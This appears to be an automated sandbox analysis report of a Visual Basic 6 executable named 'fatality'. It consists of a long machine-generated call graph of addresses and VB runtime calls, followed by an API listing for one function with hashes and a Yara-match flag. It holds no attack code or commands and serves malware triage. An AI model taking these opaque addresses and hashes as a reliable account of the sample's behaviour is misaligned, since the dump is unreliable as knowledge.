__vbaRecUniToAnsi 5786->5789 5791 40d3e8 5787->5791 5792 40d3c8 __vbaHresultCheckObj 5787->5792 5788->5789 5794 40e028 5788->5794 5789->5824 5790 40f8f0 4 API calls 5790->5824 5795 40d3f2 __vbaFreeObj 5791->5795 5792->5795 5797 40e04a #580 __vbaStrToAnsi 5794->5797 5803 40e044 __vbaSetSystemError 5794->5803 5805 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 5794->5805 5800 40d415 5795->5800 5797->5794 5798 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 5798->5776 5801 40e107 5798->5801 5799 4123c0 47 API calls 5804 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 5799->5804 5806 40d440 5800->5806 5807 40d420 __vbaHresultCheckObj 5800->5807 5811 40e117 __vbaSetSystemError 5801->5811 5808 40d307 5802->5808 5809 40d2ea __vbaHresultCheckObj 5802->5809 5803->5797 5810 40ee70 24 API calls 5804->5810 5805->5789 5819 40d488 5806->5819 5820 40d46b __vbaHresultCheckObj 5806->5820 5807->5806 5812 40d311 __vbaObjSet 5808->5812 5809->5812 5813 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5810->5813 5811->5766 5815 40d33f 5812->5815 5814 40dbbb __vbaStrCopy 5813->5814 5813->5824 5816 40ee70 24 API calls 5814->5816 5817 40d367 5815->5817 5818 40d34a __vbaHresultCheckObj 5815->5818 5822 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5816->5822 5821 40d371 __vbaFreeObjList 5817->5821 5818->5821 5819->5744 5823 40d49e __vbaI2I4 __vbaFreeObj 5819->5823 5820->5819 5822->5824 5825 40dc2f __vbaStrCat __vbaStrMove 5822->5825 5834 40d4e9 5823->5834 5824->5789 5824->5790 5824->5798 5824->5799 5827 4128b0 65 API calls 5824->5827 5831 411d10 1112 API calls 5824->5831 5826 40fba0 30 API calls 5825->5826 5828 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5826->5828 5827->5824 5830 415660 145 API calls 5828->5830 5829 40d6db 5829->5744 5832 40dc9b __vbaFreeStr 5830->5832 5831->5824 5832->5824 5833 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5832->5833 5835 40fba0 30 API calls 5833->5835 5834->5829 5836 40d567 5834->5836 5837 40d547 __vbaHresultCheckObj 5834->5837 5838 40dd14 5835->5838 5839 40d571 __vbaChkstk 5836->5839 5837->5839 5840 40dd24 __vbaNew2 5838->5840 5844 40dd63 __vbaObjSet __vbaObjSet 5838->5844 5841 40d5b9 5839->5841 5840->5838 5842 40d5ea __vbaObjSet 5841->5842 5843 40d5ca __vbaHresultCheckObj 5841->5843 5849 40d646 5842->5849 5843->5842 5845 412c10 452 API calls 5844->5845 5846 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5845->5846 5848 415d30 404 API calls 5846->5848 5850 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 5848->5850 5851 40d651 __vbaHresultCheckObj 5849->5851 5852 40d66e 5849->5852 5853 4111a0 122 API calls 5850->5853 5855 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 5851->5855 5852->5855 5854 40de51 __vbaFreeStr 5853->5854 5854->5824 5856 40de6f #598 5854->5856 5855->5744 5857 40fba0 30 API calls 5856->5857 5858 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5857->5858 5858->5824 5859 419674 __vbaFileClose __vbaFileClose 5860 41968d __vbaExitProc 5859->5860 5861 4196c2 __vbaFreeStr __vbaFreeStr __vbaFreeStr 5860->5861 6096 40edfa 6097 40ee00 __vbaFreeStr 6096->6097 6098 40ee09 __vbaFreeStrList __vbaFreeVarList 6096->6098 6097->6098 4353 408d7c 4354 40abac __vbaErrorOverflow 4353->4354 4355 408d8d 4353->4355 4356 40abc0 __vbaChkstk 4354->4356 4357 408da2 18 API calls 4355->4357 4358 4091be __vbaStrCmp 4355->4358 4360 40ac15 __vbaOnError 4356->4360 4544 410180 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 4357->4544 4361 4091e0 4358->4361 4362 40948c __vbaStrCmp 4358->4362 4364 418c90 20 API calls 4360->4364 4367 4125a0 60 API calls 4361->4367 4365 409b34 __vbaStrCopy 4362->4365 4366 4094ae 4362->4366 4363 408e8c 19 API calls 4368 410180 65 API calls 4363->4368 4369 40ac50 4364->4369 4371 40ee70 24 API calls 4365->4371 4370 4125a0 60 API calls 4366->4370 4377 409203 4367->4377 4372 408fa5 7 API calls 4368->4372 4373 418c90 20 API calls 4369->4373 4374 4094c1 4370->4374 4375 409b52 __vbaStrMove __vbaStrCopy 4371->4375 4380 410180 65 API calls 4372->4380 4381 40ac75 4373->4381 4382 409509 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 4374->4382 4388 40fba0 30 API calls 4374->4388 4383 40ee70 24 API calls 4375->4383 4376 40924b __vbaStrCat #600 __vbaFreeVar 4378 409298 4376->4378 4379 4092aa __vbaStrCopy 4376->4379 4377->4376 4384 40fba0 30 API calls 4377->4384 4392 4092a4 __vbaSetSystemError 4378->4392 4387 40ee70 24 API calls 4379->4387 4386 40902e 25 API calls 4380->4386 4390 409573 4382->4390 4389 409b74 13 API calls 4383->4389 4385 40921c 4384->4385 4391 415660 145 API calls 4385->4391 4393 410180 65 API calls 4386->4393 4394 4092c8 __vbaStrMove __vbaStrCopy __vbaFreeStrList 4387->4394 4395 4094da 4388->4395 4564 411590 12 API calls 4389->4564 4398 409584 __vbaHresultCheckObj 4390->4398 4399 4095a7 4390->4399 4400 409235 #580 4391->4400 4392->4379 4401 409177 __vbaFreeStrList 4393->4401 4406 409309 __vbaObjSet 4394->4406 4402 415660 145 API calls 4395->4402 4397 409c6c __vbaFreeStrList 4403 409c99 __vbaEnd 4397->4403 4404 409cab 4397->4404 4405 4095b1 __vbaFreeObj 4398->4405 4399->4405 4400->4376 4407 4094f3 #580 4402->4407 4408 409dec __vbaStrCopy 4403->4408 4409 4125a0 60 API calls 4404->4409 4412 4095d0 __vbaStrCopy 4405->4412 4413 40932e 4406->4413 4407->4382 4410 40ee70 24 API calls 4408->4410 4411 409cbe 4409->4411 4414 409e0a __vbaStrMove __vbaStrCopy 4410->4414 4411->4408 4415 409cca #535 4411->4415 4611 410fb0 __vbaRecUniToAnsi 4412->4611 4417 409362 4413->4417 4418 40933f __vbaHresultCheckObj 4413->4418 4420 40ee70 24 API calls 4414->4420 4421 40aba7 4415->4421 4422 409cea 8 API calls 4415->4422 4419 40936c 7 API calls 4417->4419 4418->4419 4593 410780 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 __vbaOnError 4419->4593 4425 409e2c 7 API calls 4420->4425 4421->4421 4426 410180 65 API calls 4422->4426 4429 409ee9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 4425->4429 4430 409d5a __vbaFreeStrList 4426->4430 4434 418c90 20 API calls 4429->4434 4435 40fba0 30 API calls 4430->4435 4439 409f3c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 4434->4439 4440 409d86 #598 4435->4440 4443 418c90 20 API calls 4439->4443 4444 415660 145 API calls 4440->4444 4447 409fa2 __vbaFreeStrList 4443->4447 4448 409dac 4444->4448 4615 418a10 __vbaChkstk __vbaStrCopy __vbaStrCopy __vbaOnError __vbaStrToAnsi 4447->4615 4452 409db3 4448->4452 4453 409db5 #535 __vbaFpR4 4448->4453 4458 409dd6 #580 4452->4458 4453->4422 4453->4458 4458->4408 4660 404d50 4544->4660 4546 410204 __vbaSetSystemError __vbaRecUniToAnsi 4547 404dc4 4546->4547 4548 410254 __vbaSetSystemError __vbaRecAnsiToUni #525 __vbaStrMove 4547->4548 4553 4102ad 4548->4553 4549 4104dd 4550 4104ed CloseHandle 4549->4550 4552 410514 __vbaFreeStr __vbaAryDestruct __vbaFreeStr __vbaFreeStr 4550->4552 4551 4102d8 __vbaSetSystemError 4551->4553 4554 41031d __vbaGenerateBoundsError 4551->4554 4552->4363 4553->4549 4553->4551 4555 410329 __vbaStrToAnsi 4553->4555 4556 410358 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr #616 __vbaStrMove 4553->4556 4563 4104aa __vbaSetSystemError __vbaRecAnsiToUni 4553->4563 4554->4555 4555->4553 4557 410b60 12 API calls 4556->4557 4558 4103b9 __vbaStrMove __vbaFreeStr __vbaLenBstr 4557->4558 4559 410480 __vbaRecUniToAnsi 4558->4559 4560 4103e9 6 API calls 4558->4560 4559->4553 4560->4559 4561 41046d 4560->4561 4562 410080 18 API calls 4561->4562 4562->4559 4563->4553 4565 411684 4564->4565 4566 411cff __vbaErrorOverflow 4564->4566 4565->4566 4567 4116a1 8 API calls 4565->4567 4568 41179f __vbaI2I4 __vbaFileClose 4565->4568 4569 40ee70 24 API calls 4567->4569 4570 411c91 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 4568->4570 4571 41171b __vbaStrMove 4569->4571 4570->4397 4573 40ee70 24 API calls 4571->4573 4574 411730 __vbaStrMove __vbaStrCmp __vbaFreeStrList 4573->4574 4575 411781 __vbaI2I4 __vbaFileClose 4574->4575 4576 411772 4574->4576 4575->4570 4576->4566 4577 4117ce __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 4576->4577 4577->4566 4578 41181c 4577->4578 4578->4566 4579 411825 __vbaI2I4 __vbaFileSeek 4578->4579 4580 40fba0 30 API calls 4579->4580 4581 411851 6 API calls 4580->4581 4585 4118d9 4581->4585 4582 4119d6 __vbaI2I4 __vbaFileClose 4583 40fba0 30 API calls 4582->4583 4586 4119fd 11 API calls 4583->4586 4584 411907 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 4584->4566 4584->4585 4585->4566 4585->4582 4585->4584 4587 411978 6 API calls 4585->4587 4589 411ad1 4586->4589 4587->4585 4588 411bdb 11 API calls 4588->4570 4589->4566 4589->4588 4590 411aff __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 4589->4590 4591 411bc9 #598 4589->4591 4592 411b70 6 API calls 4589->4592 4590->4566 4590->4589 4591->4589 4592->4591 4594 404d50 4593->4594 4595 410804 __vbaSetSystemError __vbaRecUniToAnsi 4594->4595 4662 404dc4 4595->4662 4664 40538c 4611->4664 4666 405b6c 4615->4666 4661 404d59 4660->4661 4663 404dcd 4662->4663 4665 405395 4664->4665 4667 405b75 4666->4667 5864 415601 __vbaFreeVar 5865 40c700 __vbaChkstk __vbaOnError 5866 40cc00 5865->5866 5867 40c76a 5865->5867 5868 40cc42 __vbaErrorOverflow 5866->5868 5869 40c78f __vbaHresultCheckObj 5867->5869 5871 40c7af 5867->5871 5870 40cc50 __vbaOnError 5868->5870 5869->5871 5872 40ccaa __vbaObjSet 5870->5872 5873 40cc9a __vbaNew2 5870->5873 5875 40c7f7 5871->5875 5876 40c7da __vbaHresultCheckObj 5871->5876 5877 40ccdc 5872->5877 5873->5872 5875->5868 5880 40c80d __vbaI2I4 __vbaFreeObj 5875->5880 5876->5875 5878 40ccf1 __vbaObjSet 5877->5878 5879 40cce2 __vbaHresultCheckObj 5877->5879 5882 40cd09 5878->5882 5879->5878 5881 40c858 5880->5881 5881->5866 5885 40c87f __vbaObjSet 5881->5885 5883 40cd1e __vbaFreeObjList __vbaExitProc 5882->5883 5884 40cd0f __vbaHresultCheckObj 5882->5884 5886 40cd56 5883->5886 5884->5883 5887 40c89d 5885->5887 5888 40c8c5 5887->5888 5889 40c8a8 __vbaHresultCheckObj 5887->5889 5888->5868 5890 40c8dd __vbaFreeObj 5888->5890 5889->5888 5891 40c8fd 5890->5891 5892 40c95c 5891->5892 5893 40c93c __vbaHresultCheckObj 5891->5893 5894 40c966 __vbaChkstk 5892->5894 5893->5894 5895 40c9ae 5894->5895 5896 40c9d6 5895->5896 5897 40c9b9 __vbaHresultCheckObj 5895->5897 5898 40c9e0 __vbaObjSet 5896->5898 5897->5898 5899 40ca18 __vbaFreeObjList 5898->5899 5900 40cbf4 5899->5900 5901 40ca47 5899->5901 5902 40ca8c 5901->5902 5903 40ca6c __vbaHresultCheckObj 5901->5903 5904 40ca96 __vbaChkstk 5902->5904 5903->5904 5905 40cade 5904->5905 5906 40cb0f __vbaObjSet 5905->5906 5907 40caef __vbaHresultCheckObj 5905->5907 5909 40cb6b 5906->5909 5907->5906 5910 40cb93 5909->5910 5911 40cb76 __vbaHresultCheckObj 5909->5911 5912 40cb9d __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 5910->5912 5911->5912 5912->5900 6100 40b480 __vbaChkstk 6101 40b4d5 __vbaOnError 6100->6101 6102 40bf23 __vbaErrorOverflow 6101->6102 6103 40b503 6101->6103 6106 40bf30 __vbaChkstk 6102->6106 6104 40b521 __vbaLenBstr 6103->6104 6105 40be1b #580 __vbaStrToAnsi 6103->6105 6108 40b550 6104->6108 6109 40b841 __vbaLenBstr 6104->6109 6250 40556c 6105->6250 6110 40bf85 __vbaOnError 6106->6110 6108->6102 6112 40b569 __vbaInStr 6108->6112 6113 40bb90 __vbaLenBstr 6109->6113 6114 40b85c 6109->6114 6115 418b50 15 API calls 6110->6115 6118 40b599 __vbaLenBstr 6112->6118 6119 40b5b6 6112->6119 6113->6105 6116 40bbac __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6113->6116 6114->6102 6114->6113 6123 40b88e __vbaInStr 6114->6123 6120 40bfbb 6115->6120 6121 40fba0 30 API calls 6116->6121 6118->6102 6118->6119 6122 40fba0 30 API calls 6119->6122 6124 418b50 15 API calls 6120->6124 6125 40bbfa __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6121->6125 6126 40b5d0 __vbaStrCopy 6122->6126 6127 40b8e5 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6123->6127 6128 40b8bf __vbaLenBstr 6123->6128 6131 40bfda 6124->6131 6132 410e60 12 API calls 6125->6132 6133 40ee70 24 API calls 6126->6133 6130 40fba0 30 API calls 6127->6130 6128->6102 6129 40b8dc 6128->6129 6129->6127 6134 40b933 __vbaFreeStrList 6130->6134 6135 418b50 15 API calls 6131->6135 6136 40bc66 __vbaFreeStrList 6132->6136 6137 40b5f4 __vbaStrMove 6133->6137 6134->6102 6138 40b96b 6134->6138 6139 40bff9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6135->6139 6136->6105 6140 40bc95 6136->6140 6137->6102 6141 40b61a 6137->6141 6138->6102 6144 40b99d 7 API calls 6138->6144 6142 418c90 20 API calls 6139->6142 6143 40fba0 30 API calls 6140->6143 6141->6102 6147 40b64c #631 __vbaStrMove __vbaStrCopy 6141->6147 6145 40c04c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6142->6145 6146 40bca6 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6143->6146 6148 410e60 12 API calls 6144->6148 6149 418c90 20 API calls 6145->6149 6150 419150 113 API calls 6146->6150 6151 40ee70 24 API calls 6147->6151 6152 40ba2f __vbaFreeStrList __vbaFreeVar 6148->6152 6153 40c0b2 __vbaFreeStrList __vbaCastObj __vbaObjSet 6149->6153 6154 40bd05 __vbaFreeStrList 6150->6154 6155 40b685 8 API calls 6151->6155 6157 40ba78 6152->6157 6158 40bb59 6152->6158 6163 40c0f4 6153->6163 6154->6105 6159 40bd34 #580 __vbaLenBstr 6154->6159 6211 410e60 __vbaChkstk __vbaOnError __vbaStrToAnsi 6155->6211 6162 40fba0 30 API calls 6157->6162 6158->6102 6160 40bb72 __vbaInStr 6158->6160 6164 40bd61 6 API calls 6159->6164 6165 40bdd4 #600 6159->6165 6160->6113 6168 40ba89 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6162->6168 6169 40c11f 6163->6169 6170 40c0ff __vbaHresultCheckObj 6163->6170 6171 40be04 __vbaStrCopy 6164->6171 6165->6171 6218 419150 11 API calls 6168->6218 6173 40c129 __vbaFreeObj __vbaNew __vbaObjSet 6169->6173 6170->6173 6171->6105 6178 40c15f 6173->6178 6177 40bae8 __vbaFreeStrList 6177->6158 6181 40bb13 #580 #600 6177->6181 6182 40c18a 6178->6182 6183 40c16a __vbaHresultCheckObj 6178->6183 6181->6158 6186 40c194 __vbaFreeObj 6182->6186 6183->6186 6187 40c1b3 __vbaStrCopy 6186->6187 6188 410fb0 18 API calls 6187->6188 6189 40c1d1 __vbaStrMove 6188->6189 6190 40ee70 24 API calls 6189->6190 6191 40c1e6 __vbaStrMove __vbaInStr __vbaFreeStrList 6190->6191 6192 40c229 __vbaStrCopy 6191->6192 6193 40c3cc __vbaStrCopy 6191->6193 6195 40ee70 24 API calls 6192->6195 6194 410fb0 18 API calls 6193->6194 6196 40c3ea __vbaStrMove 6194->6196 6197 40c24d 6 API calls 6195->6197 6198 40ee70 24 API calls 6196->6198 6199 40ee70 24 API calls 6197->6199 6200 40c3ff __vbaStrMove __vbaInStr __vbaFreeStrList 6198->6200 6201 40c2ad 15 API calls 6199->6201 6202 40c442 6200->6202 6203 40c675 6200->6203 6201->6203 6204 40c452 __vbaNew2 6202->6204 6205 40c46e 6202->6205 6204->6205 6206 40c4c4 6205->6206 6207 40c4a4 __vbaHresultCheckObj 6205->6207 6208 40c521 6206->6208 6209 40c4fe __vbaHresultCheckObj 6206->6209 6207->6206 6210 40c52b 20 API calls 6208->6210 6209->6210 6210->6203 6252 405338 6211->6252 6219 40ee70 24 API calls 6218->6219 6220 419240 __vbaStrMove 6219->6220 6221 40ee70 24 API calls 6220->6221 6222 419251 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6221->6222 6223 419285 __vbaFileClose 6222->6223 6224 419298 __vbaGet3 __vbaLenBstr 6222->6224 6225 41968d __vbaExitProc 6223->6225 6226 4196ef __vbaErrorOverflow 6224->6226 6247 4192bc 6224->6247 6227 4196c2 __vbaFreeStr __vbaFreeStr __vbaFreeStr 6225->6227 6227->6177 6228 419652 __vbaFileClose __vbaExitProc 6228->6225 6228->6227 6229 4192e7 __vbaGet3 #525 __vbaStrMove __vbaGet3 __vbaGet3 6230 419347 6 API calls 6229->6230 6231 419337 __vbaStrCopy 6229->6231 6232 4193ac 6230->6232 6231->6230 6233 4193eb __vbaUI1I2 __vbaUI1I2 6232->6233 6235 4193c1 __vbaGenerateBoundsError 6232->6235 6236 4193c7 __vbaUI1I2 6232->6236 6254 419870 __vbaRedim __vbaRedim __vbaGetOwner3 6233->6254 6235->6236 6236->6226 6236->6232 6238 4195e3 __vbaFileClose 6238->6226 6238->6247 6240 419447 __vbaUI1I2 6240->6247 6241 41961e __vbaFileSeek 6241->6226 6241->6247 6242 418f30 17 API calls 6242->6247 6243 418e20 7 API calls 6243->6247 6244 419493 __vbaGenerateBoundsError 6244->6247 6245 4194b5 __vbaUI1I2 6245->6226 6246 4194d2 __vbaUI1I2 6245->6246 6246->6226 6246->6247 6247->6226 6247->6228 6247->6229 6247->6241 6247->6242 6247->6243 6247->6244 6247->6245 6248 41957b __vbaGenerateBoundsError 6247->6248 6249 4195a1 __vbaGenerateBoundsError 6247->6249 6255 418e20 6247->6255 6270 419700 6247->6270 6248->6247 6249->6247 6251 405575 6250->6251 6253 405341 6252->6253 6254->6247 6256 418f21 __vbaErrorOverflow 6255->6256 6257 418e35 6255->6257 6258 418e46 __vbaRedim __vbaGetOwner3 6257->6258 6259 418ec8 6257->6259 6260 418e88 6258->6260 6261 418eaa __vbaGenerateBoundsError 6258->6261 6262 418efc __vbaGenerateBoundsError 6259->6262 6264 418ed8 6259->6264 6260->6261 6263 418e8e 6260->6263 6268 418ea6 6261->6268 6266 418ef8 6262->6266 6263->6268 6269 418e9a __vbaGenerateBoundsError 6263->6269 6265 418ee6 __vbaGenerateBoundsError 6264->6265 6264->6266 6265->6266 6266->6256 6267 418f16 6266->6267 6267->6240 6268->6240 6269->6268 6271 419741 6270->6271 6272 419828 __vbaAryDestruct 6270->6272 6273 419860 __vbaErrorOverflow 6271->6273 6274 41974b __vbaRedim __vbaAryLock 6271->6274 6272->6238 6276 41979f __vbaGenerateBoundsError 6274->6276 6277 41977e 6274->6277 6279 4197aa __vbaAryLock 6276->6279 6277->6276 6278 419784 6277->6278 6280 419796 __vbaGenerateBoundsError 6278->6280 6281 419798 6278->6281 6282 4197d6 __vbaGenerateBoundsError 6279->6282 6283 4197bb 6279->6283 6280->6281 6281->6279 6284 4197d2 6282->6284 6283->6282 6285 4197c1 6283->6285 6287 4197f9 __vbaSetSystemError __vbaAryUnlock __vbaAryUnlock __vbaPutOwner3 6284->6287 6285->6284 6286 4197cd __vbaGenerateBoundsError 6285->6286 6286->6284 6287->6272 6288 40fd80 __vbaFreeStrList __vbaFreeVarList 6289 40e780 6290 40e7ba __vbaOnError __vbaCastObj __vbaObjSet 6289->6290 6291 40e7e6 6290->6291 6292 40e7ec __vbaHresultCheckObj 6291->6292 6293 40e7fe __vbaFreeObj __vbaExitProc 6291->6293 6292->6293 6294 40e81e 6293->6294 5913 40ae04 __vbaFreeStrList 5914 40b405 __vbaFreeStrList __vbaFreeVar 5915 40e306 __vbaFreeObj 5916 40cc07 __vbaFreeObjList __vbaFreeVar 6300 415c8a __vbaI2I4 __vbaFileClose __vbaI2I4 __vbaFileClose __vbaExitProc 6301 415ce0 6 API calls 6300->6301 4680 40290c #100 4681 402933 4680->4681 4681->4681 5917 41910c __vbaAryUnlock __vbaAryUnlock 5918 40480f 5919 40bf30 __vbaChkstk 5918->5919 5920 40bf85 __vbaOnError 5919->5920 5963 418b50 __vbaChkstk __vbaStrCopy __vbaStrCopy __vbaOnError __vbaStrToAnsi 5920->5963 5964 405dd8 5963->5964 5965 418bdf __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr __vbaStrToAnsi 5964->5965 5971 405e68 5965->5971 5972 405e71 5971->5972 5973 40ab10 __vbaFreeStrList __vbaFreeObj __vbaFreeVarList 5976 40cf19 __vbaFreeObjList __vbaFreeVarList 5977 40e51b __vbaFreeStrList __vbaFreeObj 6305 41679a __vbaAryUnlock 6306 40aca0 __vbaChkstk 6307 40acf5 __vbaOnError 6306->6307 6308 40ad2a __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6307->6308 6309 40ad1b 6307->6309 6310 418c90 20 API calls 6308->6310 6309->6308 6311 40ad7d __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 6310->6311 6312 418c90 20 API calls 6311->6312 6313 40ade3 __vbaFreeStrList 6312->6313 6314 40ae18 6313->6314 6315 40e6a0 6316 40e6e5 __vbaOnError __vbaCastObj __vbaObjSet 6315->6316 6317 40e711 6316->6317 6318 40e717 __vbaHresultCheckObj 6317->6318 6319 40e729 __vbaFreeObj __vbaRaiseEvent __vbaExitProc 6317->6319 6318->6319 6320 40e756 6319->6320 5979 40ff26 5980 40ff35 __vbaFreeStrList __vbaFreeVar 5979->5980 5981 40ff2c __vbaFreeStr 5979->5981 5981->5980 5982 404829 5983 40cc50 __vbaOnError 5982->5983 5984 40ccaa __vbaObjSet 5983->5984 5985 40cc9a __vbaNew2 5983->5985 5987 40ccdc 5984->5987 5985->5984 5988 40ccf1 __vbaObjSet 5987->5988 5989 40cce2 __vbaHresultCheckObj 5987->5989 5990 40cd09 5988->5990 5989->5988 5991 40cd1e __vbaFreeObjList __vbaExitProc 5990->5991 5992 40cd0f __vbaHresultCheckObj 5990->5992 5993 40cd56 5991->5993 5992->5991 5999 40e138 __vbaFreeStrList __vbaFreeObjList __vbaFreeVar 6000 41003a 6001 410040 __vbaFreeStr 6000->6001 6002 410049 __vbaFreeStr 6000->6002 6001->6002 6003 40ea3b 6004 40ea45 __vbaFreeStr 6003->6004 6005 40ea4e __vbaFreeStrList 6003->6005 6004->6005 6006 40cd3e __vbaFreeObjList

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00410180 Relevance: 52.7, APIs: 35, Instructions: 220COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                            • #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                            • #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 004104ED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$Free$AnsiMoveSystem$#525#616BoundsBstrChkstkCloseConstruct2CopyDestructGenerateHandleListUnicode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2038761106-0
                                                                                                                                                            • Opcode ID: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
                                                                                                                                                            • Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
                                                                                                                                                            • Opcode Fuzzy Hash: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
                                                                                                                                                            • Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54
                                                                                                                                                            Function 00408C50 Relevance: 670.6, APIs: 377, Strings: 5, Instructions: 2055COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
